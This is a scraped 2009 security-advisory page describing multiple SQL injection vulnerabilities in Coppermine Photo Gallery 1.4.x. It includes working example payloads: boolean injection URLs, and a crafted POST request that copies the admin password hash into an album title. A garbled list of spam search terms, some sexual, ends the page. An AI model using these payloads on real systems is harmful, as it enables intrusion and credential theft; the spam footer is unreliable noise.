about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Coppermine Photo Gallery Multiple SQL Injection Vulnerabilities


Title Coppermine Photo Gallery Multiple SQL Injection Vulnerabilities
Published 2009-05-18-12:00AM
Updated 2009-05-19-10:30PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  girex
Vulnerable  Coppermine Photo Gallery 1.4.22
Coppermine Photo Gallery 1.4.21
Coppermine Photo Gallery 1.4.20
Coppermine Photo Gallery 1.4.18
Coppermine Photo Gallery 1.4.17
Coppermine Photo Gallery 1.4.16
Coppermine Photo Gallery 1.4.15
Coppermine Photo Gallery 1.4.14
Coppermine Photo Gallery 1.4.13
Coppermine Photo Gallery 1.4.12
Coppermine Photo Gallery 1.4.11
Coppermine Photo Gallery 1.4.10
Coppermine Photo Gallery 1.4.9
Coppermine Photo Gallery 1.4.4
Coppermine Photo Gallery 1.4.3
Coppermine Photo Gallery 1.4.2
Coppermine Photo Gallery 1.4
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following example data, URIs and exploit are available:http://www.example.com/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=1%23 true
http://www.example.com/[path]/thumnails.php?album=alpha&GLOBALS[cat]=99999' OR 1=2%23 falsePOST /[path]/db_input.php HTTP/1.1
Host: [host]
Keep-Alive: 300
Connection: keep-alive
Cookie: [your_cookies]
Content-Type: application/x-www-form-urlencodedevent=album_update&title=x&aid=[YOUR_ALBUM_ID]&alb_password=%5C&alb_password_hint=,title=(SELECT user_password FROM cpg14x_users WHERE user_id=1) WHERE aid=[YOUR_ALBUM_ID]%23http://www.example.com/[path]/displayecard.php?data=[$injection] HTTP/1.1
  • /data/vulnerabilities/exploits/35009.pl
  • TXT  t3xt 1t!


    Advertising

    Copyright 2007, SecurityDot
    Mon, 30 Nov 2009 02:27:03 +0000

    Friends : milw0rm.com , secunia.com , securityfocus.com
    GOOGLE
    NEWS EXPLOITS VULNS
    exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
    tate vBulletin+ play366.co mambo Remo pornogfaph bbs.play36 Www sexy g www.bestse sxe 4.3 home.play3 game.hsw.c Nude sania news for c VIDIO SEXE Sex.Goa.Co www.liveho SEXMAXX.CO phpcafe Sexyimag t768t Mom in tra zuoai-8.co mambo Remo CMS is Fre Sexxx.Com mambo Remo gt-chat Www dasepa news for c real urdu sexyr Sakeela se Moboods Sexycolleg Www.Blue v phpbb++por www.fengdo Www.Sex.Ch THIRISHA S mareya www.nd23.c Www.18sexe mambo Remo news for c Moboods 200 /compo wwwcom.89 www.fengdo THIRISHA S all cartoo